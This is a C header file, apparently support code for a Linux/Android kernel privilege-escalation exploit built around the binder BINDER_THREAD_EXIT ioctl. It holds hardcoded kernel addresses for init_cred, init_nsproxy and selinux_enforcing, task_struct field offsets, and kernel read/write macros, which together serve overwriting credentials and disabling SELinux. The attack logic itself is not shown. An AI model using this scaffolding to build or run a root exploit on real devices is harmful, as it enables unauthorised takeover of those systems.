#pragma once
#ifndef __EXPLOIT_H__
#define __EXPLOIT_H__
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>
/////////////
// HELPERS //
/////////////
// Current indentation depth for the logging macros below; each unit is
// emitted as one tab character.
// NOTE(review): a non-static object definition in a header becomes a
// duplicate symbol as soon as a second translation unit includes this file.
int tabs = 0;

// Write `tabs` tab characters to `file`; writes nothing when tabs <= 0.
static inline void indent(FILE* file)
{
    int remaining = tabs;
    while (remaining-- > 0) {
        fputc('\t', file);
    }
}
//////////////////////
// CONSTANT DEFINES //
//////////////////////
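// `nullptr` as a macro predates the C23 keyword of the same name; NULL from
// <stddef.h> is the portable spelling. The expansion is fully parenthesised
// so it behaves as one operand (e.g. `sizeof nullptr`, or as a cast operand).
#define nullptr ((void*)0)
#define DEADBEEF 0xdeadbeeful
// ioctl request number used by the including file.
#define BINDER_THREAD_EXIT 0x40046208ul
// Size of one iovec buffer and number of iovecs; their use is defined by the
// including file, not here.
#define IOVEC_SIZE 0x10000
#define IOVECS_LEN 25
// Retry count and wait durations for the driver loop — presumably seconds,
// confirm at the sleep call sites.
#define MAX_TRIALS 4
#define RETRY_WAIT 3
#define SUCCESS_WAIT 1
#define RACE_CONDITION_WAIT 2
// ANSI SGR escape sequences for coloured log output (KNRM resets).
#define KNRM "\x1B[0m"
#define KRED "\x1B[31m"
#define KGRN "\x1B[32m"
#define KYEL "\x1B[33m"
#define KBLU "\x1B[34m"
#define KMAG "\x1B[35m"
#define KCYN "\x1B[36m"
#define KWHT "\x1B[37m"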
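// Kernel symbol addresses, taken from the target build's System.map:
// ffffffff80200000 T _stext
// ffffffff81433ac0 D init_nsproxy
// ffffffff816acfe8 B selinux_enforcing
// ffffffff81433c30 D init_cred
// They belong to that one build; any other kernel image needs its own values.
#define KERNEL_BASE 0xffffffff80200000ul
#define INIT_NSPROXY 0xffffffff81433ac0ul
#define SELINUX_ENFORCING 0xffffffff816acfe8ul
#define INIT_CRED 0xffffffff81433c30ul
// Distance of a symbol from KERNEL_BASE. The argument is parenthesised so an
// expression argument is not split by the subtraction.
#define KERNEL_OFFSET(name) ((name) - KERNEL_BASE)
// Field offsets within struct task_struct for the same build, computed with
// the gdb expressions in the trailing comments.
// macro define offsetof(_type, _memb) ((long)(&((_type *)0)->_memb))
#define ADDR_LIMIT_OFFSET 0xa18ul // p /x (long)offsetof(struct task_struct, thread) + (long)offsetof(struct thread_struct, addr_limit)
#define PID_OFFSET 0x4e8ul // p /x offsetof(struct task_struct, pid)
#define NSPROXY_OFFSET 0x6c0ul // p /x offsetof(struct task_struct, nsproxy)
#define REAL_CRED_OFFSET 0x680ul // p /x offsetof(struct task_struct, real_cred)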
//////////////////////
// FUNCTION DEFINES //
//////////////////////
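// Logging macros. The first variadic argument is passed straight to printf
// as the format, so it must be a string literal, never caller-supplied text.
// Each body is wrapped in do { ... } while (0) so the macro is one statement
// and is safe in an unbraced if/else.
#define SUCCESS(...) do { \
    indent(stdout); \
    printf("%s[*]%s ", KGRN, KNRM); \
    printf(__VA_ARGS__); \
    printf("\n"); \
    fflush(stdout); \
} while (0)
#define INFO(...) do { \
    indent(stdout); \
    printf("%s[+]%s ", KYEL, KNRM); \
    printf(__VA_ARGS__); \
    printf("\n"); \
    fflush(stdout); \
} while (0)
// Error prefix plus message on stderr, no trailing newline: ERR and
// ERR_CHILD append the errno value and the newline themselves.
#define NORET_ERR(...) do { \
    indent(stderr); \
    fprintf(stderr, "%s[!]%s ", KRED, KNRM); \
    fprintf(stderr, __VA_ARGS__); \
    fflush(stderr); \
} while (0)
// Report the error and terminate the process with errno as the exit status.
// errno is captured first, because the stdio calls in between may change it.
#define ERR_CHILD(...) do { \
    int saved_errno_ = errno; \
    NORET_ERR(__VA_ARGS__); \
    fprintf(stderr, ": 0x%x\n", saved_errno_); \
    fflush(stderr); \
    exit(saved_errno_); \
} while (0)
// Report the error and return false from the enclosing bool-returning
// function. errno is captured before any stdio call can overwrite it.
#define ERR(...) do { \
    int saved_errno_ = errno; \
    NORET_ERR(__VA_ARGS__); \
    fprintf(stderr, ": 0x%x\n", saved_errno_); \
    fflush(stderr); \
    return false; \
} while (0)
// Wrappers over kernelCopy(src, dst, len), which the including file must
// provide; the argument order is inferred from these two uses. Arguments are
// parenthesised so expression arguments bind as intended.
#define READ_FROM_KERNEL(var, addr) kernelCopy((addr), &(var), sizeof(var))
#define WRITE_TO_KERNEL(var, addr) kernelCopy(&(var), (addr), sizeof(var))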
#endif //__EXPLOIT_H__